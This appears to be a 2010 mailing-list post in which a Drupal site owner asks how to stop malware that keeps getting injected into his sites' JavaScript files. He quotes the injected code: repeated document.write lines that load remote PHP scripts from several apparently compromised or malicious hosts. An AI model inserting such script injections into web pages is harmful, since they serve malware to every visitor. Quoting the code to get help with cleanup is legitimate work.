This is the malware code which document.write('<script src=http://heightsevents.com/_private/header-1.php><\/script>'); document.write('<script src=http://heightsevents.com/_private/header-1.php><\/script>'); document.write('<script src=http://heightsevents.com/_private/header-1.php><\/script>'); document.write('<script src=http://heightsevents.com/_private/header-1.php><\/script>'); document.write('<script src= http://pause-gallery.freehostia.com/themes/thumbnails.php ><\/script>'); document.write('<script src= http://pause-gallery.freehostia.com/themes/thumbnails.php ><\/script>'); document.write('<script src= http://pause-gallery.freehostia.com/themes/thumbnails.php ><\/script>'); document.write('<script src= http://pause-gallery.freehostia.com/themes/thumbnails.php ><\/script>'); document.write('<script src=http://emirersoy.com/images/EmirErsoy.php><\/script>'); document.write('<script src=http://emirersoy.com/images/EmirErsoy.php><\/script>'); document.write('<script src=http://emirersoy.com/images/EmirErsoy.php><\/script>'); document.write('<script src= http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>'); document.write('<script src= http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>'); document.write('<script src= http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>'); document.write('<script src= http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>'); document.write('<script src= http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>'); document.write('<script src= http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>'); document.write('<script src=http://acta-endo.ro/imagini/.img.php><\/script>'); document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php><\/script>'); document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php><\/script>'); document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php><\/script>'); document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php><\/script>'); document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php><\/script>'); document.write('<script src=http://jobstt.co.cc/wp-admin/postinblogr.php><\/script>'); document.write('<script src=http://metalfiltre.com/fckeditor/indexz.php><\/script>'); On Tue, Apr 20, 2010 at 10:59 AM, sushyl <sushyl@gmail.com> wrote:
HI, I am having malware problems with all my drupal sites. A piece of code gets inserted in all or some javascript(.js) files. Its happening even to the files with permissions "644". I have to remove the code and submit the site for review on webmaster tools on google, so that mozilla-firefox does not give malware. It takes 2-3 days. This is happening again and again, and i have to repeat same process each time. Is there any permanent solution for this issue?
I am giving the code that gets into the files. Sometimes the links in that code are different.
Thanks -- Sushil Hanwate
-- Regards Sushil Hanwate.